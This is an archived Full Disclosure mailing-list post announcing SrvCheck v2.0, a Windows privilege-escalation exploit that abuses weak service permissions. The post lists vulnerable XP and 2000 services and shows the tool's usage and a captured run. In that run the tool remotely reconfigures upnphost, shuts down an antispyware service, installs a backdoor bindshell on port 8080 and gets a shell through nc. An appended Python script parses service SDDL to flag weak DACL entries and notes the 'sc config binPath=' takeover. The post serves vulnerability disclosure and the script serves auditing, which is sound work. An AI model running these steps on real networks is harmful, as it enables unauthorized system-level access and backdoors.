Full Disclosure mailing list archives
Privilege Escalation for Windows Networks using weak Service restrictions v2.0 exploit
From: Andres Tarasco <atarasco () gmail com>
Date: Sun, 12 Feb 2006 19:28:16 +0100
Proof of concept of Sudhakar Govindavajhala and Andrew Appel's paper
(http://www.cs.princeton.edu/~sudhakar/papers/winval.pdf). Running as an
unprivileged user you can test whether your services are vulnerable and can be
used to install a backdoor. Both source code and binary are included.

Microsoft advisory: http://microsoft.com/technet/security/advisory/914457.mspx

SrvCheck v2.0 is able to perform these checks remotely, using for example
domain user credentials.

Here is a short list of known vulnerable services under XP SP2:

- Advanced User:
  Service: DcomLaunch (SYSTEM)
  Service: UpnpHost (Local Service)
  Service: SSDPSRV (Local Service)

- User:
  Service: UpnpHost (Local Service)
  Service: SSDPSRV (Local Service)

- Network Config Operators:
  Service: DcomLaunch (SYSTEM)
  Service: UpnpHost (Local Service)
  Service: SSDPSRV (Local Service)
  Service: DHCP (SYSTEM)
  Service: NetBT (SYSTEM - .sys driver)
  Service: DnsCache (SYSTEM)

Windows 2000 Professional SP4:

- Power User:
  Service: WMI - Windows Management Instrumentation Driver Extensions (SYSTEM)

Third-party software:

  HP: "Pml Driver HPZ12"
  Autodesk: "Autodesk Licensing Service" - maybe this one:
  http://securityfocus.com/bid/16472

D:\Programación\srvcheck2>srvcheck2.exe -?
Services Permissions checker v2.0 (c) 2006 Andres Tarasco - atarasco () gmail com

Usage:
  -l            list vulnerable services
  -m <service>  modify the configuration for that service
  -c <command>  command to execute through the remote service. By default
                a bindshell application will be used
  -H <Host>     specify a remote host to connect to (ip/netbiosname)
  -u <user>     (if not selected, default logon credentials are used)
  -p <password> (if not used, default logon credentials are used)
  -?
Extended information with sample examples:
  srvcheck.exe -l                                  (list local vulnerabilities)
  srvcheck.exe -m service                          (spawn a shell at port 8080)
  srvcheck.exe -m service -c "cmd.exe /c md c:\PWNED"
  srvcheck -l -H host                              (list remote vulnerabilities)

D:\Programación\srvcheck2>srvcheck2.exe -l -H 192.168.0.1
Services Permissions checker v2.0 (c) 2006 Andres Tarasco - atarasco () gmail com

[+] Trying to connect to remote SCM
[+] Host: \\192.168.0.1\IPC$
[+] Username: (null)
[+] Password: (null)
[+] Network Connection OK
[+] Listing Vulnerable Services...

[Dhcp] DHCP Client
    Status: 0x4  Parameter: C:\WINDOWS\System32\svchost.exe -k netsvcs
[Dnscache] DNS Client
    Status: 0x4  Parameter: C:\WINDOWS\System32\svchost.exe -k NetworkService
[NetBT] NetBIOS over TCP/IP
    Status: 0x4  Parameter: System32\DRIVERS\netbt.sys
[SSDPSRV] SSDP Discovery Service
    Status: 0x1  Parameter: C:\WINDOWS\System32\svchost.exe -k LocalService
[upnphost] Universal Plug and Play Device Host
    Status: 0x1  Parameter: C:\WINDOWS\System32\svchost.exe

[+] Analyzed 311 Services in your system
[+] You were Lucky. 5 vulnerable services found

D:\Programación\srvcheck2>srvcheck2.exe -H 192.168.0.1 -m upnphost
Services Permissions checker v2.0 (c) 2006 Andres Tarasco - atarasco () gmail com

[+] Trying to connect to remote SCM
[+] Host: \\192.168.0.1\IPC$
[+] Username: (null)
[+] Password: (null)
[+] Network Connection OK
[+] Uninstalling previous backdoors
[+] Granting Remote bindshell Execution..
[+] Shutting down remote antispyware Service =)
[+] Installing Backdoor Code...
[+] The service has been successfully modified =)
[+] Service Opened. Trying to Start... (wait a few seconds)
[+] StartService() Error due to a non service application execution
[+] Ignore it. Your application should be executed =)
[+] Now connect to port 8080 and enjoy your new privileges

D:\Programación\srvcheck2>nc localhost 8080
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

regards,
Andres Tarasco
Attachment:
srvcheck2.zip.REMOVE
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
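The check the tool automates, as an added example that is not Tarasco's code and not the SrvCheck source: a Python parser for the SDDL string that `sc sdshow <service>` prints, which flags DACL entries giving low-privileged well-known groups SERVICE_CHANGE_CONFIG, WRITE_DAC or WRITE_OWNER (or GENERIC_WRITE / GENERIC_ALL, which the Service Control Manager maps onto them). Those are the rights that let a user point the service's binPath at an arbitrary command (`sc config <service> binPath= ...`); if SERVICE_START is also granted the command runs as the service account as soon as the user issues `sc start <service>`, otherwise it waits for the next boot or for someone else to start it. The SDDL strings in `SAMPLES` are constructed for this example and are not the real descriptors of any Windows build.

```python
"""Flag service DACL entries that hand takeover rights to low-privileged users.

Input is the SDDL string that `sc sdshow <service>` prints.  The SDDL strings
in SAMPLES are constructed for this example; they are not the real security
descriptors of any Windows release.
"""
import re

# Service-specific, standard and generic access-right bits (winsvc.h / winnt.h).
SERVICE_QUERY_CONFIG, SERVICE_CHANGE_CONFIG = 0x0001, 0x0002
SERVICE_QUERY_STATUS, SERVICE_ENUMERATE_DEPENDENTS = 0x0004, 0x0008
SERVICE_START, SERVICE_STOP, SERVICE_PAUSE_CONTINUE = 0x0010, 0x0020, 0x0040
SERVICE_INTERROGATE, SERVICE_USER_DEFINED_CONTROL = 0x0080, 0x0100
DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER = 0x10000, 0x20000, 0x40000, 0x80000
GENERIC_ALL, GENERIC_EXECUTE = 0x10000000, 0x20000000
GENERIC_WRITE, GENERIC_READ = 0x40000000, 0x80000000
SERVICE_ALL_ACCESS = 0x000F01FF  # STANDARD_RIGHTS_REQUIRED | the nine service bits

# Two-letter codes used in the rights field of an SDDL ACE.
SDDL_RIGHT = {
    "CC": SERVICE_QUERY_CONFIG, "DC": SERVICE_CHANGE_CONFIG,
    "LC": SERVICE_QUERY_STATUS, "SW": SERVICE_ENUMERATE_DEPENDENTS,
    "RP": SERVICE_START, "WP": SERVICE_STOP, "DT": SERVICE_PAUSE_CONTINUE,
    "LO": SERVICE_INTERROGATE, "CR": SERVICE_USER_DEFINED_CONTROL,
    "SD": DELETE, "RC": READ_CONTROL, "WD": WRITE_DAC, "WO": WRITE_OWNER,
    "GA": GENERIC_ALL, "GX": GENERIC_EXECUTE, "GW": GENERIC_WRITE, "GR": GENERIC_READ,
}

# The Service Control Manager's GENERIC_MAPPING for service objects.
GENERIC_MAPPING = [
    (GENERIC_READ, READ_CONTROL | SERVICE_QUERY_CONFIG | SERVICE_QUERY_STATUS
                   | SERVICE_INTERROGATE | SERVICE_ENUMERATE_DEPENDENTS),
    (GENERIC_WRITE, READ_CONTROL | SERVICE_CHANGE_CONFIG),
    (GENERIC_EXECUTE, READ_CONTROL | SERVICE_START | SERVICE_STOP
                      | SERVICE_PAUSE_CONTINUE | SERVICE_USER_DEFINED_CONTROL),
    (GENERIC_ALL, SERVICE_ALL_ACCESS),
]

# Rights that let the holder rewrite binPath, directly or after first rewriting
# the DACL / taking ownership.  Any one of these is a finding.
TAKEOVER_RIGHTS = [(SERVICE_CHANGE_CONFIG, "SERVICE_CHANGE_CONFIG"),
                   (WRITE_DAC, "WRITE_DAC"), (WRITE_OWNER, "WRITE_OWNER")]

# SDDL aliases an ordinary local or domain user is likely to hold.
LOW_PRIV_SIDS = {"WD", "AU", "BU", "IU", "NU", "AN", "BG", "PU", "NO"}


def parse_rights(field):
    """Turn an ACE rights field ('CCDCRP' or '0xF01FF') into an access mask."""
    if field.lower().startswith("0x"):
        return int(field, 16)
    if len(field) % 2:
        raise ValueError("odd-length rights field: %r" % field)
    mask = 0
    for i in range(0, len(field), 2):
        mask |= SDDL_RIGHT[field[i:i + 2]]  # KeyError on an unknown code
    return mask


def map_generic(mask):
    """Expand generic bits the way the SCM does before an access check."""
    for generic, specific in GENERIC_MAPPING:
        if mask & generic:
            mask = (mask & ~generic) | specific
    return mask


def parse_dacl(sddl):
    """Return [(ace_type, effective_mask, trustee)] for each ACE in the DACL."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    if not m:
        return []
    aces = []
    for body in re.findall(r"\(([^)]*)\)", m.group(1)):
        parts = body.split(";")  # type;flags;rights;object;inherit_object;sid
        if len(parts) < 6:
            raise ValueError("malformed ACE: %r" % body)
        aces.append((parts[0], map_generic(parse_rights(parts[2])), parts[5]))
    return aces


def weak_entries(sddl, low_priv=LOW_PRIV_SIDS):
    """List low-privileged trustees that end up with takeover rights.

    Denies for the *same* trustee are subtracted.  A deny aimed at another
    group the caller belongs to is not modelled, so treat hits as candidates
    to confirm on the box, not as proof.
    """
    allowed, denied = {}, {}
    for ace_type, mask, sid in parse_dacl(sddl):
        if sid in low_priv and ace_type == "A":
            allowed[sid] = allowed.get(sid, 0) | mask
        elif sid in low_priv and ace_type == "D":
            denied[sid] = denied.get(sid, 0) | mask
    findings = []
    for sid, mask in allowed.items():
        eff = mask & ~denied.get(sid, 0)
        names = [name for bit, name in TAKEOVER_RIGHTS if eff & bit]
        if names:
            findings.append({"sid": sid, "rights": names,
                             "can_start": bool(eff & SERVICE_START),
                             "can_stop": bool(eff & SERVICE_STOP)})
    return findings


# Constructed SDDL samples (not captured from a real system).
SAMPLES = {
    # SYSTEM runs it, Administrators own it, Authenticated Users and Power
    # Users can only query it: nothing for an unprivileged user to abuse.
    "default_like": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                    "(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWLOCRRC;;;PU)",
    # Authenticated Users get DC+RP (rewrite binPath, then start it) and
    # Network Configuration Operators get GW, which the SCM maps to DC.
    "weak_dc_rp": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                  "(A;;CCDCLCSWRPLOCRRC;;;AU)(A;;GW;;;NO)",
    # A deny ACE ahead of the allow cancels the DC grant.
    "deny_first": "D:(D;;DC;;;AU)(A;;CCDCLCSWRPLOCRRC;;;AU)"
                  "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)",
}

if __name__ == "__main__":
    for name, sddl in SAMPLES.items():
        hits = weak_entries(sddl)
        print("%-13s %s" % (name, "WEAK" if hits else "ok"))
        for h in hits:
            print("    %s: %s (start=%s, stop=%s)" % (h["sid"], ", ".join(h["rights"]),
                                                       h["can_start"], h["can_stop"]))
```

To use it against a real host, run `sc sdshow <service>` (locally or with `sc \\host sdshow <service>`) and feed the printed string to `weak_entries`. The script resolves neither nested group membership nor deny ACEs aimed at groups other than the trustee on the allow, so a hit is a candidate to verify by actually attempting `sc config <service> binPath= ...` as the unprivileged user, which is what the posted tool does in one step.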
Current thread:
- Privilege Escalation for Windows Networks using weak Service restrictions v2.0 exploit Andres Tarasco (Feb 12)
- Re: Privilege Escalation for Windows Networks using weak Service restrictions v2.0 exploit ad () heapoverflow com (Feb 12)
- Re: Privilege Escalation for Windows Networks using weak Service restrictions v2.0 exploit Andres Tarasco (Feb 12)
- Re: Privilege Escalation for Windows Networks using weak Service restrictions v2.0 exploit ad () heapoverflow com (Feb 12)